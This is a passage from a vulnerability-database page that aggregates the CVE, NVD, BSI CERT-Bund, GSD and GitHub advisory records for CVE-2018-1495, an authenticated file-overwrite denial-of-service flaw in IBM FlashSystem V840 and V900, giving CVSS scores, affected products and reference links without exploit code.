CVE-2018-1495

Vulnerability from cvelistv5

Published

2018-05-29 17:00

Modified

2025-02-13 16:27

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C

Summary

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.

References

URL	Tags
psirt@us.ibm.com	http://www.ibm.com/support/docview.wss?uid=ssg1S1012280	Vendor Advisory
psirt@us.ibm.com	http://www.ibm.com/support/docview.wss?uid=ssg1S1012281	Vendor Advisory
psirt@us.ibm.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/141148	VDB Entry, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.ibm.com/support/docview.wss?uid=ssg1S1012280	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.ibm.com/support/docview.wss?uid=ssg1S1012281	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/141148	VDB Entry, Vendor Advisory

Impacted products

Vendor

Product

Version

▼

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T03:59:39.124Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ibm-flashsystem-cve20181495-dos(141148)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "affected",
          "product": "FlashSystem V900",
          "vendor": "IBM"
        },
        {
          "defaultStatus": "affected",
          "product": "FlashSystem V840",
          "vendor": "IBM"
        }
      ],
      "datePublic": "2018-05-11T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitCodeMaturity": "UNPROVEN",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "remediationLevel": "OFFICIAL_FIX",
            "reportConfidence": "CONFIRMED",
            "scope": "UNCHANGED",
            "temporalScore": 5.7,
            "temporalSeverity": "MEDIUM",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/A:H/AC:L/AV:N/C:N/I:N/PR:L/S:U/UI:N/E:U/RC:C/RL:O",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Denial of Service",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-09-05T03:01:03.000Z",
        "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "shortName": "ibm"
      },
      "references": [
        {
          "name": "ibm-flashsystem-cve20181495-dos(141148)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "DATE_PUBLIC": "2018-05-11T00:00:00",
          "ID": "CVE-2018-1495",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "FlashSystem V900",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "V900"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "FlashSystem V840",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "V840"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "IBM"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148."
            }
          ]
        },
        "impact": {
          "cvssv3": {
            "BM": {
              "A": "H",
              "AC": "L",
              "AV": "N",
              "C": "N",
              "I": "N",
              "PR": "L",
              "S": "U",
              "UI": "N"
            },
            "TM": {
              "E": "U",
              "RC": "C",
              "RL": "O"
            }
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Denial of Service"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ibm-flashsystem-cve20181495-dos(141148)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
            },
            {
              "name": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281",
              "refsource": "CONFIRM",
              "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
            },
            {
              "name": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280",
              "refsource": "CONFIRM",
              "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
    "assignerShortName": "ibm",
    "cveId": "CVE-2018-1495",
    "datePublished": "2018-05-29T17:00:00.000Z",
    "dateReserved": "2017-12-13T00:00:00.000Z",
    "dateUpdated": "2025-02-13T16:27:16.918Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-1495\",\"sourceIdentifier\":\"psirt@us.ibm.com\",\"published\":\"2018-05-29T17:29:00.387\",\"lastModified\":\"2024-11-21T03:59:55.367\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.\"},{\"lang\":\"es\",\"value\":\"Los productos IBM FlashSystem V840 y V900 podr\u00edan permitir que un atacante autenticado con acceso especializado sobrescriba archivos arbitrarios. Esto podr\u00eda provocar una denegaci\u00f3n de servicio (DoS). IBM X-Force ID: 141148.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"psirt@us.ibm.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:N/I:P/A:P\",\"baseScore\":5.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.0,\"impactScore\":4.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-269\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:flashsystem_900_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"191939BC-A358-434F-BAEF-CADD0BEAD091\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:ibm:flashsystem_900:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B8D92192-32CA-461B-8326-955F71EFA8E3\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:flashsystem_840_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"09EAED7A-46E1-428E-8DB1-0843D37906C9\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:ibm:flashsystem_840:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"36C11C6C-316E-4C15-96D8-5E6F1F1907A1\"}]}]}],\"references\":[{\"url\":\"http://www.ibm.com/support/docview.wss?uid=ssg1S1012280\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.ibm.com/support/docview.wss?uid=ssg1S1012281\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/141148\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"VDB Entry\",\"Vendor Advisory\"]},{\"url\":\"http://www.ibm.com/support/docview.wss?uid=ssg1S1012280\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.ibm.com/support/docview.wss?uid=ssg1S1012281\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/141148\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"VDB Entry\",\"Vendor Advisory\"]}]}}"
  }
}

wid-sec-w-2024-1173

Vulnerability from csaf_certbund

Published

2024-05-16 22:00

Modified

2024-05-16 22:00

Summary

IBM FlashSystem: Mehrere Schwachstellen

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

IBM FlashSystem is an IBM Storage enterprise system that stores data on flash memory

Angriff

Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in IBM FlashSystem ausnutzen, um einen Denial of Service Angriff durchzuführen oder um seine Privilegien zu erweitern.

Betroffene Betriebssysteme

- Sonstiges

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "hoch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "IBM FlashSystem is an IBM Storage enterprise system that stores data on flash memory",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in IBM FlashSystem ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren oder um seine Privilegien zu erweitern.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-1173 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1173.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-1173 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1173"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin vom 2024-05-16",
        "url": "https://www.ibm.com/support/pages/node/732962"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin vom 2024-05-16",
        "url": "https://www.ibm.com/support/pages/node/650907"
      }
    ],
    "source_lang": "en-US",
    "title": "IBM FlashSystem: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2024-05-16T22:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T18:09:08.058+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2024-1173",
      "initial_release_date": "2024-05-16T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-05-16T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c1.5.0.0",
                "product": {
                  "name": "IBM FlashSystem \u003c1.5.0.0",
                  "product_id": "T034892"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.4.8.1",
                "product": {
                  "name": "IBM FlashSystem \u003c1.4.8.1",
                  "product_id": "T034893"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.5.1.1",
                "product": {
                  "name": "IBM FlashSystem \u003c1.5.1.1",
                  "product_id": "T034894"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.4.8.0",
                "product": {
                  "name": "IBM FlashSystem \u003c1.4.8.0",
                  "product_id": "T034895"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.3.0.10",
                "product": {
                  "name": "IBM FlashSystem \u003c1.3.0.10",
                  "product_id": "T034896"
                }
              }
            ],
            "category": "product_name",
            "name": "FlashSystem"
          }
        ],
        "category": "vendor",
        "name": "IBM"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2018-1495",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle in IBM FlashSystem. Ein entfernter, authentifizierter Angreifer mit speziellem Zugriff kann diese Schwachstelle ausnutzen, um beliebigen Dateien zu \u00fcberschreiben und dadurch in Folge einen Denial-of-Service-Zustand verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T034892"
        ]
      },
      "release_date": "2024-05-16T22:00:00.000+00:00",
      "title": "CVE-2018-1495"
    },
    {
      "cve": "CVE-2018-1822",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle im IBM FlashSystem. Diese Schwachstelle wird nicht im Detail beschrieben. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um seine Privilegien zu erweitern oder einen Denial-of-Service-Zustand zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T034896",
          "T034895"
        ]
      },
      "release_date": "2024-05-16T22:00:00.000+00:00",
      "title": "CVE-2018-1822"
    }
  ]
}

WID-SEC-W-2024-1173

Vulnerability from csaf_certbund

Published

2024-05-16 22:00

Modified

2024-05-16 22:00

Summary

IBM FlashSystem: Mehrere Schwachstellen

Notes

Produktbeschreibung

IBM FlashSystem is an IBM Storage enterprise system that stores data on flash memory

Angriff

Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in IBM FlashSystem ausnutzen, um einen Denial of Service Angriff durchzuführen oder um seine Privilegien zu erweitern.

Betroffene Betriebssysteme

- Sonstiges

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "hoch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "IBM FlashSystem is an IBM Storage enterprise system that stores data on flash memory",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in IBM FlashSystem ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren oder um seine Privilegien zu erweitern.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-1173 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1173.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-1173 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1173"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin vom 2024-05-16",
        "url": "https://www.ibm.com/support/pages/node/732962"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin vom 2024-05-16",
        "url": "https://www.ibm.com/support/pages/node/650907"
      }
    ],
    "source_lang": "en-US",
    "title": "IBM FlashSystem: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2024-05-16T22:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T18:09:08.058+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2024-1173",
      "initial_release_date": "2024-05-16T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-05-16T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c1.5.0.0",
                "product": {
                  "name": "IBM FlashSystem \u003c1.5.0.0",
                  "product_id": "T034892"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.4.8.1",
                "product": {
                  "name": "IBM FlashSystem \u003c1.4.8.1",
                  "product_id": "T034893"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.5.1.1",
                "product": {
                  "name": "IBM FlashSystem \u003c1.5.1.1",
                  "product_id": "T034894"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.4.8.0",
                "product": {
                  "name": "IBM FlashSystem \u003c1.4.8.0",
                  "product_id": "T034895"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c1.3.0.10",
                "product": {
                  "name": "IBM FlashSystem \u003c1.3.0.10",
                  "product_id": "T034896"
                }
              }
            ],
            "category": "product_name",
            "name": "FlashSystem"
          }
        ],
        "category": "vendor",
        "name": "IBM"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2018-1495",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle in IBM FlashSystem. Ein entfernter, authentifizierter Angreifer mit speziellem Zugriff kann diese Schwachstelle ausnutzen, um beliebigen Dateien zu \u00fcberschreiben und dadurch in Folge einen Denial-of-Service-Zustand verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T034892"
        ]
      },
      "release_date": "2024-05-16T22:00:00.000+00:00",
      "title": "CVE-2018-1495"
    },
    {
      "cve": "CVE-2018-1822",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle im IBM FlashSystem. Diese Schwachstelle wird nicht im Detail beschrieben. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um seine Privilegien zu erweitern oder einen Denial-of-Service-Zustand zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T034896",
          "T034895"
        ]
      },
      "release_date": "2024-05-16T22:00:00.000+00:00",
      "title": "CVE-2018-1822"
    }
  ]
}

gsd-2018-1495

Vulnerability from gsd

Modified

2023-12-13 01:22

Details

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.

Aliases

CVE-2018-1495

Aliases

CVE-2018-1495

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-1495",
    "description": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.",
    "id": "GSD-2018-1495",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-1495"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-1495"
      ],
      "details": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.",
      "id": "GSD-2018-1495",
      "modified": "2023-12-13T01:22:37.738860Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@us.ibm.com",
        "DATE_PUBLIC": "2018-05-11T00:00:00",
        "ID": "CVE-2018-1495",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "FlashSystem V900",
                    "version": {
                      "version_data": [
                        {
                          "version_value": " "
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "FlashSystem V840",
                    "version": {
                      "version_data": [
                        {
                          "version_value": " "
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "IBM"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148."
          }
        ]
      },
      "impact": {
        "cvssv3": {
          "BM": {
            "A": "H",
            "AC": "L",
            "AV": "N",
            "C": "N",
            "I": "N",
            "PR": "L",
            "S": "U",
            "SCORE": "6.500",
            "UI": "N"
          },
          "TM": {
            "E": "U",
            "RC": "C",
            "RL": "O"
          }
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Denial of Service"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "ibm-flashsystem-cve20181495-dos(141148)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
          },
          {
            "name": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281",
            "refsource": "CONFIRM",
            "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
          },
          {
            "name": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280",
            "refsource": "CONFIRM",
            "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:flashsystem_900_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:flashsystem_900:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:flashsystem_840_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:flashsystem_840:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "ID": "CVE-2018-1495"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-269"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ibm-flashsystem-cve20181495-dos(141148)",
              "refsource": "XF",
              "tags": [
                "VDB Entry",
                "Vendor Advisory"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
            },
            {
              "name": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
            },
            {
              "name": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.5,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 4.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2019-10-09T23:38Z",
      "publishedDate": "2018-05-29T17:29Z"
    }
  }
}

ghsa-j2pq-5cv8-53j8

Vulnerability from github

Published

2022-05-13 01:33

Modified

2022-05-13 01:33

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Details

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-1495"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-05-29T17:29:00Z",
    "severity": "MODERATE"
  },
